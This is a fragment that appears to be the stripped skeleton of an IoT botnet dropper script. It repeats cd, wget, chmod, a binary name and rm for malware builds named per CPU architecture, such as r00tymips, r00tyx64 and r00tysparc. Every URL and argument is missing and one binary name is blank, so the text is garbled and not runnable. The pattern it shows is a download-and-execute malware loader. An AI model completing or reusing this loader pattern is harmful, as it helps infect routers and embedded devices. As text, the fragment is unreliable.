cd
cd
cd
cd
cd
wget
chmod
r00tymips
rm
cd
cd
cd
cd
cd
wget
chmod
r00tymipsel
rm
cd
cd
cd
cd
cd
wget
chmod
r00tysh4
rm
cd
cd
cd
cd
cd
wget
chmod
r00tyx64
rm
cd
cd
cd
cd
cd
wget
chmod
r00typhones
rm
cd
cd
cd
cd
cd
wget
chmod
r00tyi686
rm
cd
cd
cd
cd
cd
wget
chmod
r00typpc
rm
cd
cd
cd
cd
cd
wget
chmod
r00tyftp
rm
cd
cd
cd
cd
cd
wget
chmod
r00typftp
rm
cd
cd
cd
cd
cd
wget
chmod
r00tysparc
rm
cd
cd
cd
cd
cd
wget
chmod
 
rm
cd
cd
cd
cd
cd
wget
chmod
r00tyhttpd
rm
cd
cd
cd
cd
cd
wget
chmod
r00tytelnetd
rm
